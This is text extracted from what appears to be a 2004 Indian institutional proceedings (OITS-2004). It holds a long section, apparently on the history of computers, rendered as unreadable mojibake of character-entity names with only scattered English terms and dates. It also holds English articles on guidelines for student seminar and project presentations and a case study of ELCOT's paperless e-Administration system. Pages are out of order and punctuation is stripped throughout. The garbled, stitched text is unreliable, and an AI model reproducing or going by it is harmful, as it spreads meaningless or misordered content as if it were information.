LTHORNVccedil XTHORNcccedilXccedil aTHORNhegraveaTHORN]OcircETHfmacrAElig bEcircthornaOgrave_hegraveethorn

ASTHORNLETHmTHORNthorn LfETH aTHORNsETH_ aETHZTHORNSOcirc ethornETHS_Ntilde[THORNHaOtilde agrave_Ntilde[THORN A]THORN jcordfAElig Ogravel[oumlOgraveethorn LOtilde`EcircOcircVeethornthornakEcircthornf aOcircakthornETHethorn OgravekthornDRTHORNfrac14frac14ETH Ograve[ZEcirc HkTHORNthorn dsectAEligVTHORNaTHORNimacrAEligOgraveethorn LTHORNRTHORN SETHZTHORNaETH Acethorn jETHcETHSTHORNL LragravethornaOcircfrac14frac14ETHd]THORNJ LOtilde`EcircOcircVethorn aTHORNsETH_ HL A^Ecirc_THORNL aTHORN]OcircETHbthornETHaOgraveethorn `eTHORNthornNZTHORN[ HkthornETH `EcircethornETH[_ dEcircNeEcircthorn aTHORNhegraveethornjcordfAElig aTHORN]OcircETHOgraveethorn Aacutecurren akEcircthornOgrave[ D`OgravedETHN OgravekthornETHBAjEcircRTHORNfrac14frac14ETH HL]ETH SOgraveZ XETHbrvbarAEligethorn SOgraveZ LOtilde`EcircOcircVethornaTHORNOgravehyacuteiL HaOtilde jTHORNbTHORNthornmccedilthorn dsectAEligNtildefrac14 c^OcircOgraveethorn aTHORNaETH]mthornETHNTHORNmthornETHfrac14frac14ETH XETHbrvbarAEligethorn dEcircbrvbarTHORNAEligLOgravemthorn bthornNaETH_ccedil A]ETHcccedilEcircfrac14NYIumlTHORNOgravemthornfrac14frac14ETH Bbccedilthorn OgraveplusmnAEligETH`QETHethorn cETH^OcirccOgraveethorn A]ETHcccedilfrac14NbagravethorneEcircthorn AaTHORNbagravethornETHa OgravekthornOgravemthornfrac14frac14ETH `Ograveethorn `Ograveethorn joacutefrac12THORNcurrenaYIumlTHORNQETHmTHORNthornmthornETHfrac14frac14ETH Ograve[ZEcirc XETHbrvbarAEligethornNtilde aTHORN]OcircETH kUacutethorn jaagrave EcircethornETH[_frac14frac14ETHHkthornETH hEcircZTHORN jTHORNbTHORNthornmccedilthorn dsectAEligNtilde LkTHORNthornOgravemthorn _UumlETH _UumlETH bthornNaETH_ccedil`otildeOgravec jegraveNagraveLEcirc _THORNcagraveETHZ LOgravemthornfrac14frac14ETH HkthornETH`Ograveethorn `oacuteTHORNaNtildejoacutefrac12THORNcurren OgravekthornmthornETHfrac14frac14ETH OgravejTHORN ETHBUuml jTHORNbTHORNthornmccedilthorn dsectAEligNtildefrac14ethornAahOcircL[ETH OgravekthornETHBTHORNmthornETHfrac14frac14ETH Ograve[ZEcirc jTHORNbTHORNthornmccedilthorn BampTHORNfrac14_THORN AEligeTHORNOtildethornOgravekthornDRTHORN jaagrave EcircethornETH[_ aTHORN]OcircETHfrac14frac14ETH jaEcirc hEcircZTHORN LOtilde`EcircOcircVethornaTHORNOgravehyacuteiL Aacutecurren kthornjTHORN Drthornethorn Ograve]Ogravemthorn A`ZcETHOgrave_`otildeOgrave[OcircL aTHORN]OcircETHLEcirc HL _THORN~Ugravefrac12curren LotildecOgraveethorn `otildeLETHhLeEcircthornRlaquoTHORNAEligAEligfrac14frac14ETH agraveETH[ccedil HL LETHdagraveOcirc jeTHORNthornaETH `Ograveethorn ]eacuteTHORN[NtildemacrAEligLETHdagraveOcirc LeTHORNthornaETHethorn `w[THORN OgraveLDUuml aTHORN]OcircETHOgraveethorn ethornkTHORNthornRTHORN HkthornETH hEcircZTHORNaETH`Ograveethorn XETHbrvbarAEligethorn HaOtilde jTHORNbTHORNthornmccedilthorn BOtildeSTHORN_THORN AEligethornordfAElig AEligAElig OgravekthornETHB dETHBTHORNOgravemthornfrac14frac14ETH HkthornETHkUacutethorn LOtilde`EcircOcircVethorn aTHORN]OcircETHethorncEumlfcsectAEligfrac14frac14ETH LOtilde`EcircOcircVethornethorn aTHORNaragravethorn_LEcirc _Ecirc OcircETH_ LOgravemthorn

AOgravecdividecETHOgrave_ SETHZTHORN ETHeTHORNthornaETH Ograved A^Ecirc_THORNL LOtilde`EcircOcircVethornethornS_L OgravekthornDRlaquoTHORNAEligAElig QETHmccedilthornjagrave aOcircETHOgraveaSccedilfrac14frac14ETH Ogravej 1834cjTHORNkthornETHOgraveethorn A_ETHmTHORNthornVTHORNLETHmccedilthorn BampTHORNfrac14_ccedil _ETHcLLOtilde`EcircOcircVethornVTHORNH DiexclthornETHa_ LeTHORNthornBOgravemthornfrac14frac14ETH `Ograveethorn `OgraveethornS_ccedil bTHORNthorn_THORNOgravejAtildeccedilcurren AVETH_ETHj$ccedilfrac14 HaOtilde LiacuteTHORNOgrave$frac14ETHXagraveIuml OgraveaeTHORNthorncTHORNhTHORN ABgETH Ogravefrac12currenVccedil macrEcircAElig_THORNbthornethornjTHORNVTHORNOgraveethorn `otildecBOgravemthornOgraveIacuteAEligETH_THORNLccediljccedil (Electronics) LOtilde`EcircOcircVethorn[THORNAeTHORNthorn LeTHORNthornTHORNOgravemthornfrac14frac14ETH HkTHORNthornWETHOgraveethorn kUacutethorn $frac14ETHfrac12currenOgraveSOgrave_Ograveethornj_ccedil (First Generation)LOtilde`EcircOcircVethornethorn S_ecirc OgravekthornETHBTHORNmthornETHfrac14frac14ETH ]eacuteTHORN[NtildemacrAElig aTHORNhegravedEcircwjcmacrAEligOgraveethorn H_THORNALccedil (ENIAC) LOtilde`EcircOcircVethorn _THORNcUgrave[OgravekthornETHBTHORNmthornETHfrac14frac14ETH 1946 cjTHORNkthornETHOgraveethorn _THORNcUgrave[ HkTHORNthornLOtilde`EcircOcircVethornLEcirc ethornMTHORNaETH `ETHBUuml 50 $Ecircfrac14Vccedil x 30 $Ecircfrac14VccedilOethornethorn AahOcircL[ETH OgravekthornETHBTHORNmthornETH HaOtilde HkthornETHethorn JS_THORNmthornETH 30 V_ccedilfrac14frac14ETH HkTHORNthorn LOtilde`EcircOcircVethornOgraveethorn 18000bthornOcircETHLEcirccccedil VEcircOcircaccedil (Vaccum tube) mthornETHNTHORNTHORNmthornETHfrac14frac14ETHHkthornETH HL OgravejOgraveLumlAEligOgraveethorn 5000 `dagraveOcirclaquoAElig cTHORNhETHZ(Addition) LeTHORNthorn `ETHeEcircthornTHORNmthornETHfrac14frac14ETH HkthornETH c_EcirciOcircWETHeEcircthorn[OcirclaquoAEligAElig lTHORN otilde THORNmthornETHfrac14 j[ cETH[ouml aragravethorncETH_ethornLOtilde`EcircOcircVethornWETHeEcircthorn dOgravefrac12curren cxethorn THORNmthornETHfrac14frac14ETH `Ograveethorn `Ograveethorn1948 cjTHORNkthornETHOgraveethorn HLVagrave HaOtilde cOcircETHLccedilOgravemthorn cTHORNhTHORNHXccedilbthornETHLccedil (EDVAC) _ETHcL HL D_iuml[cETH_ethornLOtilde`EcircOcircVethornVTHORNH Ograve`_ccediljTHORNmccedilthornbthornETH_THORNAUuml aTHORNhegraveaTHORN]OcircETHfmacrAEligOgraveethornDiexclthornETHa_ LOgravemthornfrac14frac14ETH 1951Ograveethorn ]EcircOgravekthornUuml cTHORNhTHORN Ogravej_ccediljjccedilaEcircOcircOgraveethornETH (Census beaureau)Ograveethorn aOcircakthornETHethorn

OITS-2004

42

`ETHBUuml macrEcircAElig_THORNbthornETHLccedil LOtilde`EcircOcircVethorn [THORNAeTHORNthorn LOgravemthornfrac14frac14ETH HTHORNOgraveethornQEcirccegraveLNtildemacrAElig OgraveV`ccedilOgraveethorn [Ocirc ethornkTHORNthornaETH Aethorncdivide OgravekthornmthornETHfrac14frac14ETHHkthornETH OgravekthornDRTHORN `otildec aOcircajETHmacrTHORNAEligL bTHORNthornrTHORNthornOgraveethorn aOcircakoacutethorn[LOtilde`EcircOcircVethornfrac14frac14ETH HkTHORNthorn `otildec `THORNYIumlNtildeethorn LOtilde`EcircOcircVethorn [oacuteVTHORNdEcircbrvbarAEligTHORNmthornETH HaOtilde Ograve_L SETHNETH cETHXIumlTHORN ajEcircTHORNmthornETHfrac14frac14ETH 1947cjTHORNkthornETHOgraveethorn Ograveamccedilthorn mthornETHOgraveaETHOgraveethornOgraveVETHeTHORNthornOgraveethorn (Bell Lab)VoumlETH_ccedilSTHORNfrac12currenethornethorn DiexclthornETHa_ OVTHORNTHORNmthornETHfrac14frac14ETH bthornOcircETHLEcirccccedil VEcircOcircaccedila]fOgraveethorn VoumlETH_ccedilSTHORNfrac12currenethornethorn aOcircakthornETHethorn ]eacuteTHORN[NtildemacrAElig `THORNYIumlNtildeethornLOtilde`EcircOcircVethornLEcirc S_ecirc Ograve]mthornETHfrac14frac14ETH Lcccedil Mnagrave OgraveRETHV ALETHethornHaOtilde ^THORNL aTHORNhegraveordfAElig OgravekthornETHBTHORNaETHeEcircthorn HkTHORNthorn `THORNYIumlNtildeethornLOtilde`EcircOcircVethornethorn QETHkTHORNthorn]ETH aoacutewTHORN `ETHBmthornETHfrac14frac14ETH cETH[ouml NETHZTHORN[THORNLHaOtilde aOcircajETHmacrTHORNAEligL aTHORNOgravehyacuteiZ `ETHBUuml ]EcircB`otildeLETHethornethorn`w[THORN aOcircakoacutethorn[ OgravekthornDTHORNmthornETH dETHkthornETHLTHORN [OcirclaquoAEligAElig MnagraveETHlaquoAEligAEligaOcircETH`ETHethorn THORNmthornETHfrac14frac14ETH 1958Ograveethorn BAtildeTHORNcurrenOgraveNotildeOgraveVXccedil jLUgraveVccedil(Integrated circuit) DiexclthornETHaTHORN[ OgravekthornaETH`OgraveethornXTHORNSTHORNVETHmccedilthorn LOgrave`agraveETHOgraveethornj_ccedil (DigitalCorporation) OgraveNETHVTHORNH cTHORN_THORN LOtilde`EcircOcircVethorn [THORNAeTHORNthornLmthornETH dETHkthornETHLTHORN 15000 XmthornETHethornccedilOgraveethorn aTHORNLotildeTHORNOgravekthornETHBTHORNmthornETHfrac14frac14ETH `Ograveethorn ABaTHORNHcccedil (IBM) c^Ocirc[ETHethorn 360 jTHORNeTHORNthornSccedil (series) LOtilde`EcircOcircVethorn [THORNAeTHORNthornLmthornETHfrac14frac14ETH HkTHORNthornjaEcirc LOtilde`EcircOcircVethornNEcircXIumlTHORNL [oacute[NtildemacrAElig `THORNYIumlNtildeLOtilde`EcircOcircVethorn bthornETHaOgraveethorn `eTHORNthornNZTHORN[frac14frac14ETH `otildeOgravecOgrave`otildeETHNotildeETHcccedilethorncETHOgrave_ `iacuteNccedil OgraveaETHXagrave HaOtilde [ETHethorn aOcircakthornETHethornLeTHORNthorn LOtilde`EcircOcircVethorn jkthorn OgravedETHNETHOgravedETHN LeEcircthornTHORNOgravemthornfrac14frac14ETHHTHORNOgraveethorn 0 HaOtilde 1 LEcirc aTHORNbTHORNthorn_iuml YETHqETHOgraveethorn HAtildeoumlTHORNcurrenLethornETHdETHDTHORNmthornETHfrac14frac14ETH `Ograveethorn OgraveLETHamccedilthorn HaOtilde $frac14ethornccedilVoumlETH_ccedil `eTHORNthornbthornETHiETH HkTHORNthorn Lfrac12currenLethorn `w[THORNLEcirc jethornf LeTHORNthornOgrave]mthornETHfrac14frac14ETH1971 cjTHORNkthornETHOgraveethorn BOgraveAtildecurrenmccedilthorn _ETHcL HL LshyAEligETH_NtildecETHBOgraveLotildeETHOgrave`otildeETHOgravejjeccedilthorn (Microprocessor)

[THORNAeTHORNthorn LmthornETHfrac14frac14ETH HkthornETH kthornSETHethorn kthornSETHethorn VoumlETH_ccedilSTHORNfrac12currenethornLEcirc_THORNS c^OcircOgraveethorn HL OgraveRETHV QTHORN ccedil cETH^OcirccOgraveethorn ethornMTHORN`ETHeEcircthornTHORNmthornETHfrac14frac14ETH HkthornETHethorn D`ugraverTHORNthorn kUacutethorn Q[Ecircagrave `THORNYIumlNtildeLOtilde`EcircOcircVethornethorn S_ecirc OVETHBmthornETHfrac14frac14ETH HkthornETHethorn D`OgravedETHNOgravekthornaETH$frac14fOgraveethorn LOtilde`EcircOcircVethornethorn ALETHethorn AhETH[Ntilde[bthornETHaOgraveethorn LcTHORNNmthornETHfrac14frac14ETH Lcccedil Mnagrave HaOtilde ^THORNL OgraveaNHkthornETHLEcirc ^THORNL OgravemthornETHL`otildeTHORN AElig LethornETHBmthornETHfrac14frac14ETH 1981OgraveethornABaTHORNHcccedil (IBM) LshyAEligETH_Ntilde [ETHethorn `otildec`jagrave_ETHmccedilthorn LOtilde`EcircOcircVethorn [THORNAeTHORNthorn LmthornETHfrac14frac14ETH AOgraveceTHORNthornLETHethornVETHBcccedil cETHNETHSTHORN_ccedil (Time Magazine) HkthornETHLEcircMan of the Year AMOcircETH Ograve]mthornETHfrac14frac14ETH Q[Ecircagrave`THORNYIumlNtildeethorn LOtilde`EcircOcircVethornethorn QETHkTHORNthorn]ETH aoacutewTHORN `ETHBaETHeEcircthorn HkthornETHLEcircLTHORN eTHORNthorn Ograve]szlig_tTHORN_ LETHdagraveOcircOgraveethorn aOcircakthornETHethorn LeTHORNthornOgravekthornaOgravejTHORN ETHBUuml OgraveaszligsETH_THORNLcETHOgrave_ [`ugraveethorn OgravekthornETHBDWTHORNOgravemthornfrac14frac14ETH1970 eEcircthorn 1980 cjTHORNkthornETH c^OcircOgraveethorn LOtilde`EcircOcircVethornOgravecETHVETHOgravecETHVTHORN bthornETHaOgraveethorn AOgraveceTHORNthornLETHaETHjNtildefrac14ethorn koacutethorn]macrAEligLEcirc^THORNLETHethorn LeTHORNthornjETHeTHORNthornTHORNmthornETHfrac14frac14ETH AOgraveceTHORNthornLETHethornjEcirc ethorncETHOgraveLagraveVccedilNEcircXIumlTHORNL OgravejcETH_frac14ethorn LETHDAtildecurrenethorn ANOgraveethornLOtilde`EcircOcircVethorn OgraveLETHXIumlTHORNOtilde (Computer coding)OgravekthornETHBTHORNaETH QflaquoAEligETH aOcircETH_ethornccedilcETH_ mthornNETHBaETH AethorncdivideLOgravemthornfrac14frac14ETH

1976 cjTHORNkthornETHOgraveethorn OgraveSOgrave_ethornETHmccedilthorn OgravecETHVethornccediljccedilLshyAEligETH_Ntilde `otildec ethorn `ETHBUuml [ETHethorn LETHethornccedilOgraveethornLOtilde`EcircOcircVethornVTHORNH mthornNETHBmthornETHfrac14frac14ETH HkTHORNthorn LOtilde`EcircOcircVethornVTHORN LETHethornccedilethornOgraveaN Ograve[szligfethorn `eTHORNthorncETHZ aOcircETHOgraveVethornNtildeethorn OgravemthornOgravebthornmccedilthornOgrave[szligfethorn QETH` HaOtilde BOtildeSTHORN_ccedilethorn ayETHLEcirc Ograved OgraveLtimesZjTHORNjcmacrAEligOgraveethorn cETH`THORN `ETHeEcircthornTHORNmthornETHfrac14frac14ETH 1978 cjTHORNkthornETHethorn _OcircHL OVZETH jcNotilde `oacuteTHORNaNtildeaETHjNtildeEcircfrac14 QcLuacuteIgrave[LeTHORNthornTHORNmthornETHfrac14frac14ETH HkTHORNthornaiagrave OgraveQjccedilethorn NotildeETHumlccedilAElig cETHfrac12currenethorn `THORNVeccedilthorn

OITS-2004

43

aTHORN AEligjTHORNjccedilEcircfrac14 LOtilde`EcircOcircVethorn OgraveQjccedil OgraveMfOgraveethorn kthornethornETHBTHORNmthornETHfrac14frac14ETHaTHORNsETH_ethorn NotildeN[THORN jkthorn jETH^ETHethornZ OgravemthornETHL LTHORN eTHORNthornLOtilde`EcircOcircVethornLEcirc akEcircthornf bthornETHaOgraveethorn aOcircakthornETHethorn LeTHORNthorn ETHeTHORNthornOgraveaOgravejTHORN ETHBUuml OgraveaszligsETH_THORNLcETHOgrave_ `otildeOgraveQfrac12currenETH QfETHBOgravemthornfrac14frac14ETHOgraveSethornmicroAElig HaOtilde A`mccedilthorn (Apple) LshyAEligETH_NtildeLOtilde`EcircOcircVethornLEcirc QfETHBaETH`ETHBUuml jkthornS D`ETHmacrAElig aETHkthornETHethornLOgravemthornfrac14frac14ETH `Ograveethorn `Ograveethorn cETHBOgraveLotildeETHj$ccedilfrac14Vccedil(Microsoft)ethorn Windowsethorn DiexclthornETHa_jETH^ETHethornZ OgravemthornETHLfrac14ethorn QETHkTHORNthorn]ETHLEcirc dOgravefrac12curren aYIumlETHBmthornETHfrac14frac14ETHaragravethorncETH_ccedil AOgravec `qc `THORNYIumlNtildeethorn LOtilde`EcircOcircVethorn D`OgraveethornAOgravemthornETHQ_ETH LeTHORNthornaETHfrac14frac14ETH HkthornETHethorn NotildeN[THORN `ETHBUumlOgraveaszligsETH_THORNLcETHOgrave_ ]THORN_ethornETH[THORN NOgraveaiZETH LeTHORNthorn _EumlA _EumlA[Ocirc cETH^OcirccOgraveethorn `oacuteTHORNaNtildeaETHjNtildeEcircfrac14 QLTHORN[ LeTHORNthornaETHOgraveethornmthornETHNTHORNRlaquoTHORNAEligAEligfrac14frac14ETH HkTHORNthorn `THORNYIumlNtildeethorn LOtilde`EcircOcircVethorn cZTHORNi `eTHORNthorn QTHORNlaquoAEligAEligETHLeTHORNthorn ETHOgraveethornfrac14frac14ETH HkthornETH Ograve]MTHORN ETHOgraveethorn lethorn QTHORNkiumlTHORNthorn ETHOgraveethornHaOtilde cZTHORNi `eTHORNthorn _Ecircbthorna LeTHORNthorn ETHOgraveethornfrac14frac14ETH jaEcircWETHeEcircthorncSETHLETH OgravekthornmthornETH HkthornETH hveEcircthorn bTHORNthorn_iuml bTHORNthorn_iuml OgravemthornETHLEcircfrac14QTHORNkiumlTHORNthorn ETHOgraveethorn HaOtilde RaTHORNeEcircthorn c^Ocirc aTHORNOgravehyacuteiZ LeTHORNthorn bTHORNthorn_iuml[ETHaETHeTHORNthorn ETHOgraveethornfrac14frac14ETH HkTHORNthorn `THORNYIumlNtildeethorn LOtilde`EcircOcircVethornOgraveethorn Loacute[oumlTHORNc aEcircwTHORN(Artificial Intelligence)ethorn jkthornETHmacrAElig[ETH_THORNAdETHHfrac14frac14ETH HkTHORNthorn ]ccedilbEumlthorn[ aTHORN]OcircETHethorn `otildeOgravemacrAEligETHN $frac14fOgraveethornLOtilde`EcircOcircVethorn MZTHORN bTHORNthorn[Ograveethorn `otildeOgraveah LeTHORNthorn aTHORNOgravehyacuteiZLeTHORNthorn ETHOgraveethorn DrthorncopyAElig AOgraveNiuml AEligNTHORNeTHORNthorn c^OcircOgraveethorn `otildeOgraveahLeTHORNthorn [Ocirc jOtildeNotildekthorn LeTHORNthorn ETHOgraveethorn XETHbrvbarAEligethorn `eTHORNthorn OgraveethornNNtildeOgrave]MTHORN ETHOgraveethorn cZTHORNi `eTHORNthorn D``ETH]OcircLEcirc `otildecETHZLeTHORNthorn ETHOgraveethorn `ETHZTHORNOgraveethorn aEcircXIumlTHORN ETHOgraveethorn HaOtilde [ETHjccedil J OgraveQjccedilA]THORN OgraveMfTHORN ETHOgraveethornfrac14frac14ETH OgraveLOgrave[L LETHdagraveOcirc LeTHORNthornaETH`ETHBUuml[NtildelccedilZ aEcircwTHORN HaOtilde NETH^ sETH_ethorn AahOcircL[ETH

OgravekthornETHBETHHfrac14frac14ETH dETHkthornETHLTHORN Ograve_L jcmacrAEligOgraveethorn SOgraveZjETH^ETHethornZ OgravemthornETHL `lOgraveethorn jcdividea OgravekthornETHB _ETHHfrac14frac14ETHH`eTHORNthornLTHORN OgraveLOgrave[L LETHdagraveOcirc LeTHORNthornaETH`ETHBUuml HLeEcircthorn ^THORNLaTHORN]OcircETHOgraveethorn `ETHethorn=frac14c THORNaETH OgravemthornETHL ]ethornLETHethornOgravekthornETHBETHAlaquoTHORNAEligfrac14frac14ETH OgravejkTHORNthorn eTHORNthorn `otilde[THORNbthornETHaETH_ccedil aOcircbrvbarTHORNAEligfrac14ethorndOgravefrac12curren bthornETHa `eTHORNthornmthornlTHORN[ OgravekthornETHBETHHfrac14frac14ETH cETH[ouml Loacute[oumlTHORNcaEcircwTHORNethorn D`OgravedETHNOgraveethorn _THORNcUgrave[ Expert system HkTHORNthornbthornETHa EumlethornZ LeTHORNthornETHHfrac14frac14ETH

aEcircwTHORNcETH_ccedil aOcircbrvbarTHORNAEligVTHORNH Ograved`eTHORNthorn _EumlA`eTHORNthornOgraveahOgraveethorn _THORNSLEcirc hNtildeOotilde METH`ccedil MEcircAB Ograve_BETHHHkTHORNthorn qc THORNYIumlNtildeethorn LOtilde`EcircOcircVethorn _THORNSethorn NtildehbrvbarTHORNAElig afOgraveethornSVTHORNf LETHdagraveOcircLEcirc jcETH^ETH_ LeTHORNthornETHHfrac14frac14ETH

About the author Jyotiranjan Hota is a softwareconsultant with an exposure to Indian and Internationalprojects He is a BE in Computer Science from NITRourkela and Executive PGP from Xavier Institute ofManagement Bhubaneswar He has around 11 yearsof experience in software consultancy teaching researchactivities and management consultancy He is fond ofwriting technical and general articles in newspapersand Journals of India and abroad His previousexperience includes World Bank funded Projects TataConsultancy Services and OCAC Currently he isassociated with KIIT Deemed University in Departmentof Computer Science and IT His area of strength liesin software engineering DBMS Object OrientedAnalysis and Design Software Project ManagementProfessional Ethics and Decision Support System

Page 34: oits-2004.pdf - created by pdfMachine from Broadgun …OITS-2004 2 Prizes were distributed by the Chief Guest, Bikramjit Maitra. In the senior category, the first, second and third

OITS-2004

30

guide should not exceed 2 and no of seminarteams under the supervision of a seminar guideshould not exceed 4 Each group (either projector seminar) must submit an abstract or synopsisof the work to be done or presentation to be madeto their respective guides sufficiently before thecommencement of project work or seminarpresentation Seminar guides must ensure thattopics of seminars are of advanced amp state-of-the-art type These topics should not be from theUniversity course curriculum but can be basedon the basics of these subjects A schedule forthe seminar presentations should be notified byHOD to all concerned in a tabular manner withthe following fields representing the columns

rapport with them by directly speaking andby using proper eye contact A keennessshould be shown to them that thispresentation is for their learning amp benefitonly

b) The Middle bit is usually longest and canhave several sections This is structured witha logical sequence Movement from one areaor topic to another is done using verbal orvisual links OHP or LCD acetates are usefulfor breaking the middle bit up into smallerchunks

c) The End of the presentation should be asummary a conclusion a logical end to whathas gone before

iii) PracticeA number of practices should be made

about the presentation in front of the mirror infront of the cat before friends amp on ones ownetc If possible the audio visual equipments likeOHP LCD etc can be tried out before the actualday of presentations During practice feed backcan be obtained from friends regarding thespeaking speed (ie whether too fast or too slow)the visual aids (whether clear or not) logicalmovement of sequence (whether correct or not)amp overall performance (whether excellent goodor poor etc)

Following hints amp tips may be followedduring practice or at the time of actualpresentation Breathe slowly it calms you down Speak audibly but dont shout Speak at normal pare not very fast not

very slow Speak clearly Be enthusiastic Avoid using jargons and colloquialisms

unless these are familiar to the audience Be aware of your gestures

Date Time Slot Group Title of Formatof topic presentation

(LCD OHP)

Guidelines for Seminar Presentation3 PS Preparation Planning amp practicei) PreparationPreparation for seminar presentation can

be effectively done if the following questions areasked to themselves by the students concerned What do I want the audience to LEARN or

DO as a result of my presentation How can I keep the audience interested Do I know my subject

Fundamental rule is that keep itstraightforwardly simple which is abbreviatedas KISS

ii) Planning-Any form of communication should have

a structure Beginning a Middle bit and anEnda) The Beginning should tell the audience

what the presenter(s) is going to tell them Itshould be positive Presenter should engagethe audiences attention and establish

OITS-2004

31

Use large fonts if LCD or OHP are beingused

Learn from watching others follow thestrength amp reject the weaknesses of otherspeakers

Use lots of figures diagrams charts ampgraphs etc

Point to the projection (screen) not thesource

Maintain the timing perfectly

Guidelines for Project Presentation(We have assumed that project guides

project teams amp topics of the projects havealready been finalized)1st Step- Write the abstracts or synopsis of theproject2nd Step- Set a realistic timeframe

Assuming 100 effectives working days ina semester the following is a sample break upDefine your problem - - - - - - - -Write a proposal - - - - - - - -- - -Develop your solution - - - - - - -Implement your solution - - - - -Present your solution - - - - - - -Submit the project report - - - - -3rd Step-

Make proper evaluation amp assessment ofperformance of the students on the basis of finalproducts (results reports and presentation) andthe process by which they were attained Thegrade is given for the entirety of the project Asample grade system may be as followsA a consistently excellent effort that attains

project goalsB a consistently good effort that attains project

goalsC an acceptable effort that at least partially

attains the project goals

D an inconsistent or unsatisfactory effort thatonly partially attains project goals

F an unsatisfactory effort that does not attainproject goals

Tips for writing project reports 1) Sketch the outline of the project2) Expand your outline3) Write your paper4) Rewrite until you get it right

A sample outline for project reports Introduction Background Design Implementation System in Action Results Future work Conclusion ReferenceBesides these the cover page design

acknowledgement topic index index for figuresamp tales etc can be added at proper locations ofthe project report

ConclusionSince projects amp seminars are indicators of

internal amp external abilities of the engineeringstudents the respective faculty guides or co-guides must motivate their students in such amanner that they do not resort to any kind offalse means for carrying out these two mostimportant activities of their student carrer

20 days

20 days

60 days

About the author Prof MN Das is currently Professoramp HOD in the Department of Computer Science ampEngineering at KIIT Deemed University After completinghis BE in Electronics amp Telecommunication branch in1987 from UCE Burla he was with ECIL Hyderabadfor few months in its computer group Then he joinedas a lecturer in the Dept of Electronic amp Tele commengineering dept of UCE Burla and continued upto1987 He completed his ME in Electronics systems ampcommunication during this period He then joined OrissaState Electronic Development Corporation (OSEDC) Ltdfor 1987 amp continued upto 2002 During that period hecompleted his PG Diploma in Management atXIMBAfter a long 16yrs inducted experience in various areashe joined KIIT Deemed University from 2002 onwards

OITS-2004

32

Information and CommunicationTechnology (ICT) has today become an integralpart of governance especially in India ICT isviewed as a tool that will help deliver servicesboth in the public and the private sector to theubiquitous common man What used to takeyears to compile and analyse now takes just afew seconds or minutes

E-governance as a concept involvesleveraging ICT to streamline the administrativeprocess it involves computerisation of recordsfacilitating efficient transactions betweenvarious government departments networkingoffices and using websites and e-mail to bringadministrators closer to people

In the past decade e-governance has beena popular buzzword among politicians andbureaucrats alike especially in India One quasi-Government organisation in Tamil Nadu hasdecided to go the distance by implementing e-governance at a micro level their office is nowcompletely paperless and file-transfer takesplace in an electronic format

Using a tool aptly titled e-Administration Chennai-based ElectronicsCorporation of Tamil Nadu Ltd (ELCOT) withthe help of an Information and CommunicationTechnologies (ICT) organisation called Life-Lineto Business (LL2BCOM) has introduced aworkflow and document management processsans physical movement or use of paper

Designated by the Government of TamilNadu to promote IT industries in the stateELCOT besides supporting IT entrepreneurs also

Case study on ICT and e-GovKrishnan V D G

ICT amp e-Gov Specialistkrisdevgmailcom

promotes joint ventures in electronicscommunication and IT They also help developinfrastructure for the software industry in theform of IT parks and by providing effectivecommunication backbones

LL2BCOMs e-Administration toolallows ELCOT officials to sanction purchasesapprove official activities and transfer filesflawlessly in completely electronic format Witha view to introduce transparency in theirworkflow process all the files processed in theorganisation are made available on a centralserver while the status of pending files can beobtained at any stage There is no physicalmovement of files at any stage only the finalorder copies are printed and stored as physicalrecord

The Nuts and BoltsAs part of its e-governance initiative the

Government of Tamil Nadu embarked on apaper-less office drive for introducingtransparency and accountability in its internaland external transactions

ELCOT the nodal organization for ITactivities in the state decided to introduce e-Administration a paperless FileManagement System which ensures speedydisposal of files The entire process creationmovement monitoring and approval of filestakes place electronically resulting in betterutilisation of manpower This helps avoidingdelays which leads to better governanceaccording to Sudeep Jain IAS MD ELCOT

OITS-2004

33

e-Administration is the brainchild of ICTand e-Gov specialist VDG Krishnan who hasover a quarter of a century hands-on managerialexperience in the Public Sector in India and aleading MNC in North South America He isthe Founder President of Life-Line to Business(LL2BCOM Pvt Ltd) His urge was to developa simple yet effective solution that can help totransform the Governments Corporates SMEsand NGOs The tool was conceived by him afterhis return to India as an apt solution for e-Governance in the developing world based onhis experience in both the developing and thedeveloped world

e-Administration is a web-enabledplatform-independent paperless solutiondeveloped on an Open Source platform forpaperless communication within and outsidean organization It uses open source offeringssuch as J2EE JBOSS PGSQL all running onLinux

The tool according to Krishnan canreduce the cycle time for file approval from anaverage of two to three weeks to one week Thiscan also result in a considerable reduction ofpaper-usage within an organisation therebysaving valuable natural resources

According to Krishnan LL2Bs toolempowers every employee in the organizationto discharge his or her duties efficiently It hasalso reduced the dependence on subordinatesand makes the organization system-orientedrather than people-centric This is likely to resultin increased productivity

Being a Linux platform local languagecontent can also be easily added This tool canbe used by any organization whose activitiesinvolve dealing with multiple agencies forsimultaneous review and action The tool also

aids knowledge management and integrationin NGOs for self-assessment decentralised fieldupdating and centralised review andmonitoring

The ProcessELCOT conducted trials with products

offered by four to five SMEs for independentevaluation with a view to adopt the best toolThe SMEs were asked to implement thenecessary customisations to suit therequirements of ELCOT Govt

Trials were conducted over three to twelvemonths with equal opportunity given to all thevendors In each department one system wasconfigured as the server and five nodes (on anaverage) connected as clients for live testing

Says K Appuswamy General Manager (e-Governance) Many organizations hadconducted trials but only LL2Bs model workedsuccessfully at ELCOT

LL2BCOMs product was one of the fiveLAN based solutions tried out the front-endwas based on Visual Basic while the backendwas Microsoft Access SQL running on aMicrosoft Windows 2000 server in the initialtrials This tool was initially installed inELCOTs Marketing Department for about 5officers Seeing the effective use of the tool moreofficers and staff came forward voluntarily touse the tool Steadily the number was increasedand the solution upgraded to a browser basedweb version for removing the dependence onclient systems

Currently e-Administration systemconnects about 150 users in three differentlocations spread over a distance of about 25 KMsincluding their Corporate Office at Nandanamtheir Communication Division at Perungudy

OITS-2004

34

and their Chairman Mr Vivek Harinarain IASwho is the Secretary IT Govt of Tamil Nadu atthe Secretariat through a dedicated powerfulfour-way Xeon dual Processor with RAIDfacility running a versatile Oracle 9i databaseas backend on Linux advanced server centrallylocated at ELCOT Corporate office

The tool simplifies the process of generatingfiles and enables moving note sheetselectronically for approval Instead of physicallycarrying note sheets for approval from table totable the employees began using the tool Receiptof the e-document was indicated by pop-up alertmessages on the officers monitors

All letters received from external agenciescould now be scanned and converted intoelectronic documents which would then beadded to the central repository This systemenables a user to check the status of a file at anystage More importantly delays are minimisedas the files can be traced instantly through thenetwork employees can now know whichofficer has kept the file pending

The biggest advantage of e-Administration is that it enables us to view atany stage the status of pending file The detailsare available on a central server and can beaccessed by anyone having the authority Thisway workflow is simplified

LL2Bs e-Administration tool not onlyeffects a dramatic reduction of stationary usageand time taken to process documents it alsoserves to introduce transparency in the workingof any organisation

